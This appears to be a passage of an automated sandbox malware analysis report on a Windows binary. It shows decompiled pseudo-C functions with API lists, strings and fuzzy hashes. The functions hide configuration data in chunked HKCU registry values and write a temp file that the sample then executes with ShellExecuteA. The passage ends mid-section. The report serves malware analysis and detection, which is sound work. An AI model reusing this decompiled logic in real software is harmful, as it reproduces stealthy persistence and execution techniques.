Download Yara Rule

C-Code - Quality: 100%

			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4;
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						E00402544( *0x4136c4,  *0x4136c4, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

0x0040e3ca
0x0040e3e0
0x0040e3ee
0x0040e528
0x0040e52d
0x0040e52d
0x0040e3f4
0x0040e3f9
0x0040e3fb
0x0040e3fb
0x0040e3fe
0x0040e3fe
0x0040e400
0x0040e401
0x0040e407
0x0040e409
0x0040e40f
0x0040e413
0x0040e413
0x0040e41c
0x0040e421
0x0040e429
0x0040e42c
0x0040e42f
0x0040e43a
0x0040e452
0x0040e51d
0x0040e520
0x00000000
0x0040e458
0x0040e458
0x0040e458
0x0040e45b
0x0040e463
0x0040e469
0x0040e46e
0x0040e484
0x0040e48a
0x00000000
0x00000000
0x0040e491
0x0040e494
0x0040e499
0x0040e4a1
0x00000000
0x00000000
0x0040e4a3
0x0040e4a6
0x0040e4a9
0x0040e4ae
0x0040e4b4
0x0040e4b9
0x0040e4d3
0x00000000
0x00000000
0x0040e4d5
0x0040e4da
0x00000000
0x00000000
0x0040e4dc
0x0040e4df
0x0040e4e1
0x0040e4e6
0x00000000
0x00000000
0x00000000
0x0040e4e6
0x0040e4e8
0x0040e4ea
0x0040e500
0x0040e50e
0x0040e516
0x0040e516
0x00000000
0x0040e4ea

APIs

RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520

Strings

PromptOnSecureDesktop, xrefs: 0040E3D0

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID: PromptOnSecureDesktop
API String ID: 1586453840-2980165447
Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64

Uniqueness

Uniqueness Score: -1.00%

Function 00404280, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x61;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}

0x00404280
0x00404290
0x00404296
0x0040429b
0x004042b1
0x004042ba
0x004043c1
0x004043ca
0x004043cd
0x00000000
0x004043ce
0x004042c0
0x004042c3
0x004042c8
0x00000000
0x00000000
0x004042dc
0x004042e6
0x00404300
0x004043bb
0x00000000
0x00404318
0x00404322
0x0040432c
0x00404333
0x00404336
0x00404342
0x00404345
0x00404350
0x00404359
0x0040435f
0x00404366
0x00404371
0x00404375
0x00404368
0x00404368
0x00404368
0x00404384
0x0040438a
0x0040439a
0x004043ab
0x004043ae
0x004043b5
0x00000000
0x004043b5
0x00404300
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
CloseHandle.KERNEL32(00000001), ref: 004043AE

Strings

PromptOnSecureDesktop, xrefs: 004042A9

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateEvent
String ID: PromptOnSecureDesktop
API String ID: 1371578007-2980165447
Opcode ID: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
Instruction ID: 96190e95dfac0256a72039fb05246d043f10f1ed4b28fe2ef93a25e2cd6a7057
Opcode Fuzzy Hash: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
Instruction Fuzzy Hash: D94181B1900209BADB109BA2CD45FDFBFBCEF40355F104566F604B21C1D7789A51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409145, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}

0x00409145
0x00409166
0x00409174
0x0040917a
0x00409180
0x00409181
0x004091a9
0x004091b6
0x004091c9
0x004091d3
0x00000000
0x004091e1
0x004091ea

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
CharToOemA.USER32 ref: 00409174
wsprintfA.USER32 ref: 004091A9

Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1

Strings

PromptOnSecureDesktop, xrefs: 0040914E, 00409193, 00409198, 004091B5

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID: PromptOnSecureDesktop
API String ID: 3857584221-2980165447
Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8A1, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

0x0040e8a1
0x0040e8ac
0x0040e8af
0x0040e8b7
0x0040e8c0
0x0040e8c3
0x0040e8c6
0x0040e917
0x0040e91a
0x0040e932
0x0040e93a
0x0040e93a
0x0040e943
0x0040e947
0x0040e94a
0x0040e96a
0x0040e96d
0x0040e971
0x0040e974
0x0040e94c
0x0040e94f
0x0040e95c
0x0040e95f
0x0040e962
0x0040e965
0x0040e965
0x0040e979
0x0040ea3a
0x0040ea4f
0x0040ea59
0x0040ea5d
0x0040ea68
0x0040ea6a
0x0040ea6d
0x0040ea6d
0x0040e97f
0x0040e985
0x0040e98f
0x0040e994
0x0040e9a1
0x0040e9a6
0x0040e9b8
0x0040e9c0
0x0040e9c7
0x0040e9dd
0x0040ea02
0x0040ea0c
0x0040ea16
0x0040ea19
0x0040ea22
0x0040ea28
0x0040ea28
0x0040e994
0x0040ea77
0x0040ea77
0x0040ea83
0x0040ea83
0x0040e8d1
0x0040e8d4
0x0040e8d7
0x0040e8de
0x0040e8ea
0x0040e8ed
0x0040e8f5
0x0040e8fc
0x0040e90a
0x0040e90c
0x0040e911
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5

lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F

Strings

localcfg, xrefs: 0040E8AB
flags_upd, xrefs: 0040E8A7

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
String ID: flags_upd$localcfg
API String ID: 204374128-3505511081
Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD05, Relevance: 9.0, APIs: 6, Instructions: 34
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}

0x0040dd17
0x0040dd41
0x0040dd2c
0x0040dd37
0x0040dd4c
0x0040dd39
0x0040dd3b
0x00000000
0x0040dd3b
0x0040dd37
0x0040dd53
0x0040dd53
0x0040dd59
0x0040dd62
0x0040dd68
0x0040dd68
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040DD0F
GetCurrentThreadId.KERNEL32 ref: 0040DD20
GetTickCount.KERNEL32 ref: 0040DD2E
Sleep.KERNEL32(00000000,?,73B743E0,?,00000000,0040E538,?,73B743E0,?,00000000,?,0040A445), ref: 0040DD3B
InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
GetCurrentThreadId.KERNEL32 ref: 0040DD53

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
String ID:
API String ID: 3819781495-0
Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E

Uniqueness

Uniqueness Score: -1.00%

Function 004080C9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				CHAR _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 =  *0x4121a8; // 0x0
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C(0x4121a8,  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}

0x004080c9
0x004080d7
0x004080da
0x004080e0
0x004080ed
0x0040810b
0x00408110
0x00408115
0x00000000
0x00408130
0x00408151
0x00408156
0x00408167
0x00408216
0x0040821d
0x00408222
0x00000000
0x00408222
0x0040818b
0x004081f7
0x004081f7
0x004081fe
0x00000000
0x00000000
0x00408201
0x00408206
0x00000000
0x00408198
0x0040819b
0x004081a0
0x004081a1
0x004081a8
0x0040820d
0x00408210
0x00000000
0x00408210
0x004081aa
0x004081c2
0x00000000
0x00000000
0x004081c4
0x004081ca
0x004081cd
0x004081cd
0x004081cf
0x004081d0
0x004081d8
0x004081dd
0x004081de
0x004081e5
0x00000000
0x00000000
0x004081ef
0x0040820c
0x0040820c
0x00000000
0x0040820c
0x0040818b
0x004080ef
0x004080ef
0x00408225
0x00408225
0x0040822b
0x0040822d
0x00408233
0x0040823f
0x00408244
0x0040824b
0x0040824d
0x00408259
0x0040825e
0x00408264
0x00408269
0x0040824b
0x00408233
0x00408273
0x00408273

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 0040815F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408187
RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 004081BE
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408210

Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Strings

PromptOnSecureDesktop, xrefs: 0040814B, 00408150, 0040821C

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
String ID: PromptOnSecureDesktop
API String ID: 124786226-2980165447
Opcode ID: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
Opcode Fuzzy Hash: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E095, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}

0x0040e09c
0x0040e0ba
0x00000000
0x0040e172
0x0040e0c3
0x0040e0c6
0x0040e0c9
0x0040e0cc
0x0040e0cc
0x0040e0ce
0x0040e0cf
0x0040e0d7
0x0040e0d9
0x0040e0df
0x0040e0e3
0x0040e0e3
0x0040e0ec
0x0040e0f1
0x0040e0f4
0x0040e0f9
0x0040e13f
0x0040e149
0x0040e158
0x0040e161
0x00000000
0x0040e0fb
0x0040e0fb
0x0040e0fb
0x0040e102
0x0040e104
0x0040e104
0x0040e110
0x0040e115
0x0040e12f
0x00000000
0x00000000
0x0040e131
0x0040e134
0x0040e136
0x0040e13b
0x00000000
0x00000000
0x00000000
0x0040e13b
0x0040e13d
0x00000000
0x0040e13d

APIs

